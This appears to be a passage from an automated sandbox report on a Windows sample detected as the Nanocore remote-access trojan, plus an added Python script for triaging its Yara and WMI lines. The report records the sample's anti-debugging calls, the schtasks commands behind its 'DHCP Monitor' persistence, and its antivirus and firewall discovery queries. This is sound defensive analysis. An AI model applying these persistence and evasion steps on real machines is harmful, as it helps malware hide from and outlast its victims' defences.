        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_1_00401C88
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_1_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 17_2_00401E1D SetUnhandledExceptionFilter,17_2_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 17_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 17_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00401C88
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 17_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 17_1_00401E1D SetUnhandledExceptionFilter,17_1_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_2_00401E1D SetUnhandledExceptionFilter,22_2_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00401C88
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_1_00401E1D SetUnhandledExceptionFilter,22_1_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_1_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_1_00401C88
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_1_00401F30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        Contains functionality to prevent local Windows debugging
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 0_2_10001140 Cgrlcpdlsle,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,FindCloseChangeNotification,0_2_10001140
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 11_2_10001140 Cgrlcpdlsle,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,FindCloseChangeNotification,11_2_10001140
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Section loaded: unknown target: C:\Users\user\Desktop\bGf2H3tXGg.exe protection: execute and read and write
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: unknown target: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Process created: C:\Users\user\Desktop\bGf2H3tXGg.exe 'C:\Users\user\Desktop\bGf2H3tXGg.exe'
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp'
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp'
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Process created: C:\Users\user\Desktop\bGf2H3tXGg.exe C:\Users\user\Desktop\bGf2H3tXGg.exe 0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: bGf2H3tXGg.exe, 00000003.00000002.491387515.0000000002695000.00000004.00000001.sdmp Binary or memory string: Program Manager
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmp Binary or memory string: Progman
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
        Source: bGf2H3tXGg.exe, 00000003.00000002.490038547.0000000002548000.00000004.00000001.sdmp Binary or memory string: Program Manager`
        Source: bGf2H3tXGg.exe, 00000003.00000002.492942931.00000000029A7000.00000004.00000001.sdmp Binary or memory string: Program ManagerHa
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_2_0040208D cpuid 3_2_0040208D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00401B74
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: Yara match | File source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.339201684.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORY
        Source: Yara match | File source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORY
        Source: Yara match | File source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORY
        Source: Yara match | File source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORY
        Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY
        Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORY
        Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORY
        Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORY
        Source: Yara match | File source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPE
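
        The Yara list above and the SecurityCenter2 WMI queries earlier in this section are machine-friendly: the .sdmp names carry a process index, a snapshot number, a base address and a page protection; the .unpack names carry the same process index in decimal plus the image name; the "Process Memory Space" entries carry PIDs. The Python below is an added example written for this page, not part of the Joe Sandbox report or of any Joe Sandbox tooling. It reduces the lines to a per-process view and singles out hits in executable (RWX) memory, which is where in-place unpacking shows up. The field layout assumed for the .sdmp names is inferred from the values on this page and is an assumption; the PAGE_* protection constants are the documented Windows values. The sample input is a handful of lines copied from this section, with the two report columns joined by " | ".

```python
"""Per-process triage of the Joe Sandbox signature lines in this report.

Added example for this page; not part of the report or of Joe Sandbox itself.
  .sdmp memory dumps   <proc>.<snap>.<id>.<base>.<protect>.<type>.sdmp
  .unpack PE dumps     <proc>.<snap>.<image>.<base>.<n>[.raw].unpack
  WMI queries          IWbemServices::ExecQuery - <namespace> : <query>
ASSUMPTION: the .sdmp layout (hex process index, snapshot 1 = early / 2 = end
of run, base, PAGE_* protection, type) is inferred from the page's values.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# winnt.h page protections: every PAGE_EXECUTE* value has a bit in the high nibble.
PAGE_EXECUTE_MASK = 0xF0
PAGE_NAMES = {0x02: "R", 0x04: "RW", 0x20: "RX", 0x40: "RWX"}

SDMP_RE = re.compile(r"^(?P<proc>[0-9A-F]{8})\.(?P<snap>[0-9A-F]{8})\.\d+\."
                     r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp$")
UNPACK_RE = re.compile(r"^(?P<proc>\d+)\.(?P<snap>\d+)\.(?P<image>.+?)\."
                       r"(?P<base>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack$")
PIDSPACE_RE = re.compile(r"^Process Memory Space: (?P<image>.+?) PID: (?P<pid>\d+)$")
YARA_RE = re.compile(r"File source:\s*(?P<src>.+?),\s*type:\s*\w+\s*$")
WMI_RE = re.compile(r"IWbemServices::ExecQuery - (?P<ns>\S+) : (?P<query>.+?)\s*$")

# Constructed sample: lines copied from this section (report columns joined with " | ").
SAMPLE = r"""
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: Yara match | File source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY
Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPE
"""


@dataclass(frozen=True)
class Region:
    proc: int             # sandbox process index (hex in .sdmp names, decimal in .unpack names)
    snap: int             # snapshot number (assumed: 1 = early, 2 = end of run)
    base: int             # region base address
    prot: Optional[int]   # PAGE_* value for .sdmp entries, None for .unpack entries
    image: Optional[str]  # process image name, only carried by .unpack entries


def parse_yara_sources(text: str) -> Tuple[List[Region], Set[Tuple[str, int]]]:
    """Return the matched regions and the (image, PID) pairs with whole-process hits."""
    regions: List[Region] = []
    pids: Set[Tuple[str, int]] = set()
    for line in text.splitlines():
        m = YARA_RE.search(line)
        if not m:
            continue
        src = m["src"]
        if (s := SDMP_RE.match(src)):
            regions.append(Region(int(s["proc"], 16), int(s["snap"], 16),
                                  int(s["base"], 16), int(s["prot"], 16), None))
        elif (u := UNPACK_RE.match(src)):
            regions.append(Region(int(u["proc"]), int(u["snap"]),
                                  int(u["base"], 16), None, u["image"]))
        elif (p := PIDSPACE_RE.match(src)):
            pids.add((p["image"], int(p["pid"])))
    return regions, pids


def process_images(regions: List[Region]) -> Dict[int, str]:
    # Process index -> image name, learned from the .unpack entries.
    return {r.proc: r.image for r in regions if r.image}


def executable_hits(regions: List[Region]) -> List[Tuple[int, int, str]]:
    """Yara hits inside executable memory as (proc, base, protection).

    An RWX hit at the image base (0x400000 here) is the in-place unpacking the
    report's "overwrites its own PE header" signature refers to; RW-only hits
    are just payload copies in heap or mapped data and are left out.
    """
    hits = {(r.proc, r.base, PAGE_NAMES.get(r.prot, hex(r.prot)))
            for r in regions if r.prot is not None and r.prot & PAGE_EXECUTE_MASK}
    return sorted(hits)


def wmi_classes_queried(text: str) -> Dict[str, Set[str]]:
    """Distinct WMI classes per namespace; the SecurityCenter2 trio is AV/FW/AS discovery."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for line in text.splitlines():
        m = WMI_RE.search(line)
        if m:
            seen[m["ns"]].add(m["query"].rsplit("FROM", 1)[-1].strip())
    return dict(seen)


def summarize(text: str) -> Dict[str, object]:
    # One dict an analyst can read instead of 120 report lines.
    regions, pids = parse_yara_sources(text)
    images = process_images(regions)
    return {
        "images": images,
        "pids": sorted(pids),
        "executable_hits": [(images.get(p, "?"), p, hex(b), prot)
                            for p, b, prot in executable_hits(regions)],
        "wmi": wmi_classes_queried(text),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```

Run against the full section, the summary ties the dhcpmon.exe processes (indexes 12, 15, 17, 22) to the same RWX hits at 0x400000 and 0x414000 that the original bGf2H3tXGg.exe processes show, which is the dropped-copy persistence the report's other signatures describe. The process-index correlation between .sdmp (hex) and .unpack (decimal) names holds for every pair on this page (0E/14, 16/22, 11/17, 0F/15, 0B/11, 0C/12), but it remains an inference from the values, not documented format.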

        Remote Access Functionality:

        Detected Nanocore Rat
